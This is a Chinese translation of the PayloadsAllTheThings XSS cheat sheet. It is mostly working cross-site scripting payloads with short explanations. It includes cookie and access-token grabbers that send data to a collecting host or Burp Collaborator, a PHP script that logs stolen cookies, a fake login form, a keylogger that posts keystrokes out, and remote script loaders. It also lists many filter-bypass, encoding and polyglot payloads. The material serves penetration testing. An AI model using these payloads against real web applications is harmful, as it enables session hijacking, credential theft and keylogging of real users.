xss payload 大全,学习如何用 xss 做到更多
转载自:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
跨 站点 脚本 跨站 脚本 ( XSS ) 是 一 种 计算机 安全 漏洞 , 通常 存在 于 Web 应用 程序 中 。 XSS 使 攻击 者 能够 将 客户 端 脚本 插入 其他 用户 查看 的 网页 中 。
总结 [TOC]
漏洞 利用 代码 或 POC XSS 的 数据 抓取 器 获取管理员Cookie或敏感访问令牌时,以下负载会将其发送到受控页。
1 2 3 4 <script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script> <script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script> <script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script> <script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script>
将收集的数据写入文件。
1 2 3 4 5 6 <?php $cookie = $_GET['c']; $fp = fopen('cookies.txt', 'a+'); fwrite($fp, 'Cookie:' .$cookie."\r\n"); fclose($fp); ?>
CORS系统 1 2 3 4 5 6 7 <script> fetch('https://<SESSION>.burpcollaborator.net', { method: 'POST', mode: 'no-cors', body: document.cookie }); </script>
UI重定向 利用XSS修改页面的HTML内容,以显示假的登录表单。
1 2 3 4 <script> history.replaceState(null, null, '../../../login'); document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>" </script>
Javascript键盘记录程序 另一种收集敏感数据的方法是设置javascript键盘记录程序。
1 <img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
其他方式 更多漏洞,请访问http://www.xss-payloads.com/payloads-list.html?a#category=all:
识别XSS端点 此有效负载在开发人员控制台中打开调试器,而不是触发弹出警告框。
1 <script>debugger;</script>
具有内容托管功能的现代应用程序可以使用沙箱域
安全地托管各种类型的用户生成的内容。许多沙箱专门用于隔离用户上传的HTML、JavaScript或Flash小程序,并确保它们无法访问任何用户数据。
因此,最好使用alert(document.domain) 或alert(window.origin) 而非alert(1) 作为默认的XSS有效负载,以便了解XSS实际执行的作用域。
更好的有效负载更换<script>alert(1)</script>:
1 <script>alert(document.domain.concat("\n").concat(window.origin))</script>
当alert() 对于反射的XSS是很好的,但对于存储的XSS来说,它很快就会成为一个负担,因为它要求在每次执行时关闭弹出窗口,所以console.log() 可用于在开发人员控制台的控制台中显示消息(不需要任何交互)。
示例:
1 <script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script>
参考文献:
工具Name 大多数工具也适用于盲目的XSS攻击:
XSS攻击 :非常受欢迎,但遗憾的是维护得不太好x系列 :利用无头浏览器检测XSS漏洞达尔福克斯 :在Go语言中实现的广泛功能和极快的速度X矛 :与Dalfox类似,但基于Ruby多姆迪格 :无头Chrome XSS测试仪
HTML中的XSS/应用程序 通用有效负载 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 // Basic payload <script>alert('XSS')</script> <scr<script>ipt>alert('XSS')</scr<script>ipt> "><script>alert('XSS')</script> "><script>alert(String.fromCharCode(88,83,83))</script> <script>\u0061lert('22')</script> <script>eval('\x61lert(\'33\')')</script> <script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm" <object/data="javascript:alert(23)"> // Img payload <img src=x onerror=alert('XSS');> <img src=x onerror=alert('XSS')// <img src=x onerror=alert(String.fromCharCode(88,83,83));> <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));> <img src=x:alert(alt) onerror=eval(src) alt=xss> "><img src=x onerror=alert('XSS');> "><img src=x onerror=alert(String.fromCharCode(88,83,83));> // Svg payload <svgonload=alert(1)> <svg/onload=alert('XSS')> <svg onload=alert(1)// <svg/onload=alert(String.fromCharCode(88,83,83))> <svg id=alert(1) onload=eval(id)> "><svg/onload=alert(String.fromCharCode(88,83,83))> "><svg/onload=alert(/XSS/) <svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script) <svg><script>alert('33') <svg><script>alert('33') // Div payload <div onpointerover="alert(45)">MOVE HERE</div> <div onpointerdown="alert(45)">MOVE HERE</div> <div onpointerenter="alert(45)">MOVE HERE</div> <div onpointerleave="alert(45)">MOVE HERE</div> <div onpointermove="alert(45)">MOVE HERE</div> <div onpointerout="alert(45)">MOVE HERE</div> <div onpointerup="alert(45)">MOVE HERE</div>
使用HTML5标签的XSS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <body onload=alert(/XSS/.source)> <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <video/poster/onerror=alert(1)> <video><source onerror="javascript:alert(1)"> <video src=_ onloadstart="alert(1)"> <details/open/ontoggle="alert`1`"> <audio src onloadstart=alert(1)> <marquee onstart=alert(1)> <meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter> <body ontouchstart=alert(1)> // Triggers when a finger touch the screen <body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen <body ontouchmove=alert(1)> // When a finger is dragged across the screen.
使用远程JS的XSS 1 2 3 4 <svg/onload='fetch("//host/a").then(r=>r.text().then(t=>eval(t)))'> <script src=14.rs> // you can also specify an arbitrary payload with 14.rs/#payload e.g: 14.rs/#alert(document.domain)
隐藏输入中的XSS 1 2 <input type="hidden" accesskey="X" onclick="alert(1)"> Use CTRL+SHIFT+X to trigger the onclick event
当有效负载以大写字母表示时,XSS 1 <IMG SRC=1 ONERROR=alert(1)>
基于DOM的XSS 基于 DOM XSS 接收 器 。
1 #"><img src=/ onerror=alert(2)>
JS 上下 文 中 的 XSS 1 2 3 -(confirm)(document.domain)// ; alert(1);// // (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
包装 器 javascript 和 数据 URI 中 的 XSS 带有 JavaScript 的 XSS :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 javascript:prompt(1) %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341 javascript:confirm(1) We can encode the "javascript:" in Hex/Octal \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) \152\141\166\141\163\143\162\151\160\164\072alert(1) We can use a 'newline character' java%0ascript:alert(1) - LF (\n) java%09script:alert(1) - Horizontal tab (\t) java%0dscript:alert(1) - CR (\r) Using the escape character \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) Using the newline and a comment // javascript://%0Aalert(1) javascript://anything%0D%0A%0D%0Awindow.alert(1)
带 数据 的 XSS :
1 2 3 data:text/html,<script>alert(0)</script> data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
带有vbscript的XSS:仅IE
文件中的XSS ** 注意:** 此处使用XML CDATA部分是为了使JavaScript有效负载不会被视为XML标记.
1 2 3 <name> <value><![CDATA[<script>confirm(document.domain)</script>]]></value> </name>
XML中的XSS 1 2 3 4 5 6 <html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> </body> </html>
SVG中的XSS 1 2 3 4 5 6 7 8 9 <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg>
SVG中的XSS(短) 1 2 3 4 5 <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg> <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg> <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
降价中的XSS 1 2 3 4 [a](javascript:prompt(document.cookie)) [a](j a v a s c r i p t:prompt(document.cookie)) [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) [a](javascript:window.onerror=alert;throw%201)
SWF Flash应用程序中的XSS 1 2 3 Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
./文件中的更多有效负载
SWF Flash应用程序中的XSS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 flashmediaelement.swf?jsinitfunctio%gn=alert`1` flashmediaelement.swf?jsinitfunctio%25gn=alert(1) ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);// swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf plupload.flash.swf?%#target%g=alert&uid%g=XSS& moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true video-js.swf?readyFunction=alert(1) player.swf?playerready=alert(document.cookie) player.swf?tracecall=alert(document.cookie) banner.swf?clickTAG=javascript:alert(1);// io.swf?yid=\"));}catch(e){alert(1);}// video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29 bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
CSS 中 的 XSS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 <!DOCTYPE html> <html> <head> <style> div { background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>"); background-color: #cccccc; } </style> </head> <body> <div>lol</div> </body> </html>
发布 消息 中 的 XSS
如果 目标 来源 是 星号 * , 则 消息 可以 发送 到 任何 引用 了 该 子 页面 的 域 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 <html> <body> <input type=button value="Click Me" id="btn"> </body> <script> document.getElementById('btn').onclick = function(e){ window.poc = window.open('http://www.redacted.com/#login'); setTimeout(function(){ window.poc.postMessage( { "sender": "accounts", "url": "javascript:confirm('XSS')", }, '*' ); }, 2000); } </script> </html>
盲 XSS XSS 猎人 XSS Hunter已弃用,可从以下位置获得https://xsshunter.com/app。您可以从[强制程序员/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
XSS Hunter允许您查找所有类型的跨站点脚本漏洞,包括经常被遗漏的盲XSS。该服务通过托管专门的XSS探测器来工作,这些探测器在启动时扫描页面并将有关有漏洞页面的信息发送到XSS Hunter服务。
1 2 "><script src=//<your.subdomain>.xss.ht></script> <script>$.getScript("//<your.subdomain>.xss.ht")</script>
其他Blind XSS工具
盲XSS终点
联系表格
票证支持
引用站点标题
用户代理
注解方块
提示 您可以使用[XSS的数据抓取器](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS Injection#data-grabber-for-xss) 和一个在线HTTP服务器,以在部署一个重型blind-XSS测试工具之前确认一个blind-XSS的存在。
例如,有效载荷
1 <script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
例如,单行HTTP服务器:
1 $ ruby -run -ehttpd . -p8080
突变的XSS 使用浏览器的怪癖重新创建一些HTML标记,当它位于element.innerHTML。
Masato Kinugawa的XSS变体,用于Google搜索中的DOMPuriify组件。技术博客可在https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ 和https://research.securitum.com/dompurify-bypass-using-mxss/。
1 <noscript><p title="</noscript><img src=x onerror=alert(1)>">
多国 语言 XSS 多国语言XSS - 0xsobky
1 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
多国语言XSS - Ashar Javed
1 ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
多语XSS -马蒂亚斯·卡尔松
1 " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
多国语言XSS - Rsnake
1 ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
多语种XSS -丹尼尔·米斯勒
1 2 3 4 5 6 7 8 9 10 11 12 13 14 ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* javascript://--></title></style></textarea></script><svg "//' onclick=alert()// /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
多国语言XSS -@s0md3v
1 -->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
1 <svg%0Ao%00nload=%09((pro\u006dpt))()//
多国语言XSS -来自@filedescriptor的多国语言挑战
1 2 3 4 5 6 7 8 9 10 11 # by crlf javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> # by europa javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> # by EdOverflow javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//> # by h1/ragnar javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
多国语言XSS -来自野兽逻辑学
1 JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
过滤器旁路和外来有效负载 旁路区分大小写 1 <sCrIpt>alert(1)</ScRipt>
绕过标签黑名单 1 2 <script x> <script x>alert('XSS')<script y>
使用代码计算绕过单词黑名单 1 2 3 4 5 6 7 eval('ale'+'rt(0)'); Function("ale"+"rt(1)")(); new Function`al\ert\`6\``; setTimeout('ale'+'rt(2)'); setInterval('ale'+'rt(10)'); Set.constructor('ale'+'rt(13)')(); Set.constructor`al\x65rt\x2814\x29```;
略过不完整的html标签 适用于IE/Firefox/Chrome/Safari浏览器
1 <img src='1' onerror='alert(0)' <
字符串不使用引号 1 String.fromCharCode(88,83,83)
绕过脚本标记中的引号 1 2 3 4 5 6 http://localhost/bla.php?test=</script><script>alert(1)</script> <html> <script> <?php echo 'foo="text '.$_GET['test'].'";';`?> </script> </html>
在mousedown事件中绕过引号 您可以在onmousedown事件处理程序中使用’绕过单引号
1 <a href="" onmousedown="var name = '';alert(1)//'; alert('smthg')">Link</a>
旁通点式过滤器 1 <script>window['alert'](document['domain'])</script>
将IP地址转换为十进制格式:即:http://192.168.1.1 你好http://3232235777 http://www.geektools.com/cgi-bin/ipconv.cgi
1 <script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
使用Linux命令对XSS有效负载进行Base64编码:即:echo -n "alert(document.cookie)" | base64 你好YWxlcnQoZG9jdW1lbnQuY29va2llKQ==
绕过字符串的括号 1 2 alert`1` setTimeout`alert\u0028document.domain\u0029`;
绕过括号和分号 1 2 3 4 5 6 7 8 9 10 // From @garethheyes <script>onerror=alert;throw 1337</script> <script>{onerror=alert}throw 1337</script> <script>throw onerror=alert,'some string',123,'haha'</script> // From @terjanq <script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> // From @cgvwzq <script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
绕过onxxxx=黑名单 1 2 3 4 5 6 7 8 9 <object onafterscriptexecute=confirm(0)> <object onbeforescriptexecute=confirm(0)> // Bypass onxxx= filter with a null byte/vertical tab <img src='1' onerror\x00=alert(0) /> <img src='1' onerror\x0b=alert(0) /> // Bypass onxxx= filter with a '/' <img src='1' onerror/=alert(0) />
旁路 空间 滤波 器 1 2 3 4 5 6 7 8 9 // Bypass space filter with "/" <img/src='1'/onerror=alert(0)> // Bypass space filter with 0x0c/^L <svgonload=alert(1)> $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd 00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al 00000010: 6572 7428 3129 0c3e 0a ert(1).>.
绕过 电子 邮件 过滤 器 (符合 RFC 标准 )
1 "><svg/onload=confirm(1)>"@x.y
绕过文档黑名单 1 2 <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script> window["doc"+"ument"]
绕过文档.cookie黑名单 这是访问Chrome、Edge和Opera上的cookie的另一种方法。请将COOKIE NAME替换为您要访问的cookie。如果getAll()方法符合您的要求,您也可以研究一下。
1 window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);});
绕过在字符串内使用javascript 1 2 3 <script> foo="text </script><script>alert(1)</script>"; </script>
使用其他方式绕过重定向 1 2 3 4 5 location="http://google.com" document.location = "http://google.com" document.location.href="http://google.com" window.location.assign("http://google.com") window['location']['href']="http://google.com"
使用替代方式绕过以执行警报 起始日期@野兽逻辑 鸣叫。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 window['alert'](0) parent['alert'](1) self['alert'](2) top['alert'](3) this['alert'](4) frames['alert'](5) content['alert'](6) [7].map(alert) [8].find(alert) [9].every(alert) [10].filter(alert) [11].findIndex(alert) [12].forEach(alert);
起始日期@中间 - 使用全局变量
keys()方法返回一个由给定对象自身属性名组成的数组,其顺序与普通循环中的顺序相同。索引号而不是函数名 。
1 2 c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; } // 5
这时打来警报的是:
1 2 3 Object.keys(self)[5] // "alert" self[Object.keys(self)[5]]("1") // alert("1")
我们可以用^a[rel]+t$这样的正则表达式找到“alert”:
1 2 3 4 5 a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a() // then you can use a() with Object.keys self[Object.keys(self)[a()]]("1") // alert("1")
一行:
1 a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1")
起始日期@泉阳 鸣叫。
1 2 3 4 prompt`${document.domain}` document.location='java\tscript:alert(1)' document.location='java\rscript:alert(1)' document.location='java\tscript:alert(1)'
起始日期@404死亡 鸣叫。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 eval('ale'+'rt(0)'); Function("ale"+"rt(1)")(); new Function`al\ert\`6\``; constructor.constructor("aler"+"t(3)")(); [].filter.constructor('ale'+'rt(4)')(); top["al"+"ert"](5); top[8680439..toString(30)](7); top[/al/.source+/ert/.source](8); top['al\x65rt'](9); open('java'+'script:ale'+'rt(11)'); location='javascript:ale'+'rt(12)'; setTimeout`alert\u0028document.domain\u0029`; setTimeout('ale'+'rt(2)'); setInterval('ale'+'rt(10)'); Set.constructor('ale'+'rt(13)')(); Set.constructor`al\x65rt\x2814\x29```;
使用替代方式绕过以触发警报
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 var i = document.createElement("iframe"); i.onload = function(){ i.contentWindow.alert(1); } document.appendChild(i); // Bypassed security XSSObject.proxy = function (obj, name, report_function_name, exec_original) { var proxy = obj[name]; obj[name] = function () { if (exec_original) { return proxy.apply(this, arguments); } }; XSSObject.lockdown(obj, name); }; XSSObject.proxy(window, 'alert', 'window.alert', false);
不使用任何内容绕过“〉” 您不需要关闭标签。
使用以下命令绕过“〈”和“〉”< and > Unicode字符U+ FF 1C和U+ FF 1 E
1 <script/src=//evil.site/poc.js>
使用其他字符绕过“;” 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 'te' * alert('*') * 'xt'; 'te' / alert('/') / 'xt'; 'te' % alert('%') % 'xt'; 'te' - alert('-') - 'xt'; 'te' + alert('+') + 'xt'; 'te' ^ alert('^') ^ 'xt'; 'te' > alert('>') > 'xt'; 'te' < alert('<') < 'xt'; 'te' == alert('==') == 'xt'; 'te' & alert('&') & 'xt'; 'te' , alert(',') , 'xt'; 'te' | alert('|') | 'xt'; 'te' ? alert('ifelsesh') : 'xt'; 'te' in alert('in') in 'xt'; 'te' instanceof alert('instanceof') instanceof 'xt';
略过使用HTML编码 1 2 3 %26%2397;lert(1) alert ></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
使用Katana绕过 使用片假名 数据库。
1 javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
使用楔形文字绕过 1 2 3 4 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
使用Lontara进行旁路 1 ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()
更多字母http://aem1k.com/aurebesh.js/#
使用ECMAScript6绕过 1 <script>alert`1`</script>
使用八进制编码绕过 1 javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
不使用Unicode 1 2 3 4 5 6 7 8 9 10 11 12 Unicode character U+FF1C FULLWIDTH LESSTHAN SIGN (encoded as %EF%BC%9C) was transformed into U+003C LESSTHAN SIGN (<) Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (") Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/ %EF%BC%9E becomes > %EF%BC%9C becomes <
绕过使用Unicode转换为大写
1 2 3 4 5 6 7 İ (%c4%b0).toLowerCase() => i ı (%c4%b1).toUpperCase() => I ſ (%c5%bf) .toUpperCase() => S K (%E2%84%AA).toLowerCase() => k <ſvg onload=... > become <SVG ONLOAD=...> <ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=>
使用UTF-7绕过 1 +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
使用UTF-8绕过 1 2 3 4 5 6 < = %C0%BC = %E0%80%BC = %F0%80%80%BC > = %C0%BE = %E0%80%BE = %F0%80%80%BE ' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7 " = %C0%A2 = %E0%80%A2 = %F0%80%80%A2 " = %CA%BA ' = %CA%B9
使用UTF-16 be绕过 1 2 %00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00 \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
使用UTF-32绕过 1 %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
略过使用材料表 字节顺序标记(页面必须以BOM字符开始。) BOM字符允许您覆盖页面的字符集
1 2 3 4 5 6 7 8 9 BOM Character for UTF-16 Encoding: Big Endian : 0xFE 0xFF Little Endian : 0xFF 0xFE XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E BOM Character for UTF-32 Encoding: Big Endian : 0x00 0x00 0xFE 0xFF Little Endian : 0xFF 0xFE 0x00 0x00 XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
使用奇怪的编码或本机解释绕过 1 2 3 4 5 <script>\u0061\u006C\u0065\u0072\u0074(1)</script> <img src="1" onerror="alert(1)" /> <iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe> <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script> 